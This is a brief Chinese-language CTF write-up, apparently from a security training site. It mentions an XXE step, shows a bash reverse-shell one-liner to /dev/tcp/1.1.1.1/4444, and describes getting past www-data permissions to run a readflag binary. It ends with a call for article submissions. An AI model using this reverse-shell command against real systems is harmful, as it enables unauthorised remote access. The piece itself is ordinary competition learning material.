前言
通过这两次比赛把自己学到的东西总结一下,不过由于名次掉的太快就没有进入决赛。
sandbox/2aeae26864f775d4cad75f15a6c95d97
&xxe;1111111
将sleep 100
改成bash -c 'bash -i >/dev/tcp/1.1.1.1/4444 0>&1'
,然后在自己的服务器监听一下。就可以反弹shell了。
getshell后发现并不能读取flag文件由于对www-data有权限的设置,但是在根目录下有一个readflag的二进制文件,但是执行它会出现一个随机计算的式子,由于nc这样的shell不能交互,但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。
运行的结果:
别忘了投稿哦
大家有好的技术原创文章
欢迎投稿至邮箱:edu@heetian.com
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦
有才能的你快来投稿吧!
了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!